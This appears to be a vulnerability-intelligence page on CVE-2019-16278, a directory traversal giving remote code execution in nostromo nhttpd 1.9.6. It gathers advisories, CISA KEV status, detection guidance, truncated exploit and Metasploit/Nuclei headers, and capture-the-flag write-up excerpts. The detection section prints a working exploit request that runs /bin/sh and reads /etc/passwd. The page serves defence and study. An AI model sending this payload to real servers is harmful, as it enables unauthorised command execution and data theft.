CVE-2019-16278
published 2019-10-14CVE-2019-16278: Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-11-28
Exploited in the wild
EPSS
99.06%
99.9th percentile
Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nazgul | nostromo_nhttpd | < 1.9.7 | 1.9.7 |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: {{Hostname}}
echo
echo
cat /etc/passwd 2>&1↗
- →Detect exploitation attempts by inspecting HTTP POST requests containing the URL-encoded carriage-return traversal sequence `/.%0d./.%0d./.%0d./.%0d./bin/sh` in the request URI targeting nostromo nhttpd. ↗
- →Alert on HTTP responses from servers advertising `nostromo` in the Server header with a version of 1.9.6 or earlier, as these are confirmed vulnerable. ↗
- →The exploit payload uses `%0d` (URL-encoded carriage return `\r`) as the directory traversal separator instead of the standard `../`, allowing bypass of path normalization checks in `http_verify`. ↗
- →Monitor for POST requests to paths matching the pattern `/.%0d./` repeated multiple times, which is the canonical traversal pattern for this CVE. ↗
- →On affected hosts, monitor access to `/var/nostromo/conf/nhttpd.conf` and `.htpasswd` files, which attackers enumerate post-exploitation to escalate privileges. ↗
- ·The vulnerability only affects non-chrooted nhttpd deployments; chrooted configurations limit the impact of the directory traversal. ↗
- ·The HOMEDIRS configuration in nhttpd.conf may expose user home subdirectories (e.g., `public_www`) even when the parent home directory is not world-readable, widening the attack surface. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-495x-r3cr-6rgx: Directory Traversal in the function http_verify in nostromo nhttpd through 1
ghsa_unreviewed·2022-05-24
CVE-2019-16278 [CRITICAL] CWE-22 GHSA-495x-r3cr-6rgx: Directory Traversal in the function http_verify in nostromo nhttpd through 1
Directory Traversal in the function http_verify in nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via a crafted HTTP request.
VulnCheck
Nostromo nhttpd Directory Traversal Vulnerability
vulncheck·2019·CVSS 9.8
CVE-2019-16278 [CRITICAL] CWE-22 Nostromo nhttpd Directory Traversal Vulnerability
Nostromo nhttpd Directory Traversal Vulnerability
Nostromo nhttpd contains a directory traversal vulnerability in the http_verify() function in a non-chrooted nhttpd server allowing for remote code execution.
Affected: Nostromo nhttpd
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://blog.radware.com/security/botnets/2020/05/whos-viktor-tracking-down-the-xtc-polaris-botnets/; https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer; https://www.bleepingcomputer.com/news/security/us-charges-chinese-winnti-hackers-for-attacking-100-plus-companies/; https://cisa.gov/news-events/cybersecurity-advisories/aa20-275a; https://
CISA
Nostromo nhttpd Directory Traversal Vulnerability
cisa·2024-11-07·CVSS 9.8
CVE-2019-16278 [CRITICAL] CWE-22 Nostromo nhttpd Directory Traversal Vulnerability
Vulnerability: Nostromo nhttpd Directory Traversal Vulnerability
Affected: Nostromo nhttpd
Nostromo nhttpd contains a directory traversal vulnerability in the http_verify() function in a non-chrooted nhttpd server allowing for remote code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.nazgul.ch/dev/nostromo_cl.txt ; https://nvd.nist.gov/vuln/detail/CVE-2019-16278
Remediation Due Date: 2024-11-28
No detection rules found.
Exploit-DB
nostromo 1.9.6 - Remote Code Execution
exploitdb·2020-01-01·CVSS 9.8
CVE-2019-16278 [CRITICAL] nostromo 1.9.6 - Remote Code Execution
nostromo 1.9.6 - Remote Code Execution
---
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278
cve2019_16278.py
#!/usr/bin/env python
import sys
import socket
art = """
_____-2019-16278
_____ _______ ______ _____\ \
_____\ \_\ | | | / / | |
/ /| || / / /|/ / /___/|
/ / /____/||\ \ \ |/| |__ |___|/
| | |____|/ \ \ \ | | | \
| | _____ \| \| | | __/ __
|\ \|\ \ |\ /| |\ \ / \
| \_____\| | | \_______/ | | \____\/ |
| | /____/| \ | | / | | |____/|
\|_____| || \|_____|/ \|____| | |
|____|/ |___|/
"""
help_menu = '\r\nUsage: cve2019-16278.py '
def connect(soc):
response = ""
try:
while True:
connect
Exploit-DB
Nostromo - Directory Traversal Remote Command Execution (Metasploit)
exploitdb·2019-11-01
CVE-2019-16278 Nostromo - Directory Traversal Remote Command Execution (Metasploit)
Nostromo - Directory Traversal Remote Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Nostromo Directory Traversal Remote Command Execution',
'Description' => %q{
This module exploits a remote command execution vulnerability in
Nostromo
[
'Quentin Kaiser ', # metasploit module
'sp0re', # original public exploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2019-16278'],
[ 'URL', 'https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html'],
],
'Platform' => ['linux', 'unix'], # OpenBSD, FreeBSD, NetBSD, and Linux
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_MIPSBE, ARCH_MIPSLE, ARCH_ARMLE, ARCH_AARCH64],
'Targ
Metasploit
Nostromo Directory Traversal Remote Command Execution
metasploit
Nostromo Directory Traversal Remote Command Execution
Nostromo Directory Traversal Remote Command Execution
This module exploits a remote command execution vulnerability in Nostromo <= 1.9.6. This issue is caused by a directory traversal in the function `http_verify` in nostromo nhttpd allowing an attacker to achieve remote code execution via a crafted HTTP request.
Nuclei
nostromo 1.9.6 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2019-16278 [CRITICAL] nostromo 1.9.6 - Remote Code Execution
nostromo 1.9.6 - Remote Code Execution
nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.
Template:
id: CVE-2019-16278
info:
name: nostromo 1.9.6 - Remote Code Execution
author: pikpikcu
severity: critical
description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
remediation: |
Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
reference:
- https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
- https://www.e
CTF
medium / README
ctf_writeups·CVSS 9.1
[CRITICAL] medium / README
---
layout: default
title: Medium Machines
parent: Machines
nav_order: 2
description: "112+ Medium HTB machine writeups with walkthroughs"
permalink: /machines/medium/
---
# HackTheBox - Medium Machines
> Comprehensive index of retired HTB Medium-difficulty machines with key techniques and attack path summaries.
**Total: 100+ machines** | Sorted roughly by retirement date (newest first)
---
## Machine Index
| # | Machine | OS | Key Techniques | Attack Path Summary | Writeup |
|---|---------|-----|----------------|---------------------|---------|
| 1 | Signed | Linux | Code Signing Bypass, Certificate Abuse | Forge code signature to deploy malicious update, escalate via trusted binary execution | [0xdf](https://0xdf.gitlab.io/2026/02/07/htb-signed.html) |
| 2 | Voleur | Linux | Data E
CTF
Traverxec / README
ctf_writeups
Traverxec / README
# Traverxec
> Write-up author: jon-brandy
## Lessons Learned:
- Exploiting nostromo 1.9.6.
## STEPS:
> PORT SCANNING
```
┌──(brandy㉿bread-yolk)-[~]
└─$ nmap -p- -sV -sC 10.10.10.165 --min-rate 1000 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-22 01:12 PST
Nmap scan report for 10.10.10.165
Host is up (0.25s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa99a81668cd41ccf96c8401c759095c (RSA)
| 256 93dd1a23eed71f086b58470973a388cc (ECDSA)
|_ 256 9dd6621e7afb8f5692e637f110db9bce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection pe
CTF
easy / README
ctf_writeups·CVSS 6.0
[MEDIUM] easy / README
---
layout: default
title: Easy Machines
parent: Machines
nav_order: 1
description: "120+ Easy HTB machine writeups with walkthroughs"
permalink: /machines/easy/
---
# HackTheBox Easy Machines - Comprehensive Reference
> Complete catalog of retired HTB Easy machines with OS, key vulnerability, attack path summary, and quality writeup links.
**Total: 100+ Easy Machines** | Updated: April 2026
---
## Quick Navigation
- [Classic / Legacy Machines (2017-2019)](#classic--legacy-machines-2017-2019)
- [2019-2020 Machines](#2019-2020-machines)
- [2021 Machines](#2021-machines)
- [2022 Machines](#2022-machines)
- [2023 Machines](#2023-machines)
- [2024 Machines (Season 4 & 5)](#2024-machines-season-4--5)
- [2025-2026 Machines (Season 6+)](#2025-2026-machines-season-6)
---
## Classic / Legac
http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.htmlhttp://www.nazgul.ch/dev/nostromo_cl.txthttps://git.sp0re.sh/sp0re/Nhttpd-exploitshttps://sp0re.shhttp://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.htmlhttp://www.nazgul.ch/dev/nostromo_cl.txthttps://git.sp0re.sh/sp0re/Nhttpd-exploitshttps://sp0re.shhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-16278
2019-10-14
Published
2024-11-07
Added to CISA KEV
Exploited in the wild